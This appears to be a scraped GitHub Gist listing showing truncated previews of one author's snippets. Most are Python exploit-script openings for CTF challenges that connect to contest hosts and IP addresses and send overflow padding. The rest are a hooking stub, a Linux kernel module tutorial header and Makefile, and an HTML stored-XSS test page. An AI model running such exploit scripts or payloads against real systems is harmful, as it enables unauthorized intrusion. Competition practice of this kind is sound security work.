Skip to content

Instantly share code, notes, and snippets.

from Pwn import *
import re
# p = Pwn(elf='./pwn004')
p = Pwn(elf='./pwn004',host='bakpwn04.grandprix.whitehatvn.com',port=23504)
def play_game(money,locky_number):
p.read_until('>')
p.sendint(1)
p.read_until('>')
from Pwn import *
p = Pwn(elf='./merge_str',host='bakpwn06.grandprix.whitehatvn.com',port=23506)
def exploit():
p.connect()
p.read_until(':')
p.sendline('A'*50)
p.read_until(':')
// SimpleHooking.cpp : Defines the entry point for the console application.
// Author : peternguyen
#include "stdafx.h"
#include <string>
#include <iostream>
#include <stdlib.h>
using namespace std;
/**
* @file ebbchar.c
* @author Derek Molloy
* @date 7 April 2015
* @version 0.1
* @brief An introductory character driver to support the second article of my series on
* Linux loadable kernel module (LKM) development. This module maps to /dev/ebbchar and
* comes with a helper C program that can be run in Linux user space to communicate with
* this the LKM.
* @see http://www.derekmolloy.ie/ for a full description and follow-up descriptions.
obj-m+=ebbchar.o
all:
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules
$(CC) testebbchar.c -o test
clean:
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) clean
rm test
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import re
p = Pwn(host='47.74.147.103',port=20001,mode=1)
# p = Pwn(mode=1)
def exploit(**kargs):
<!DOCTYPE html>
<html>
<head>
<title>SGX PWN</title>
</head>
<body>
<h1>PWN!!!</h1>
<script type="text/javascript">
function print(text)
{
alert("Stored XSS");
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
# p = Pwn(mode=1,port=8887)
p = Pwn(mode=1,host='52.193.196.17',port=56746)
def select(op):
p.read_until('Your choice: ')
from Pwn import *
p = Pwn(mode=1)
def pA32(*args):
binary = ''
for arg in args:
binary += p.p32(arg)
return binary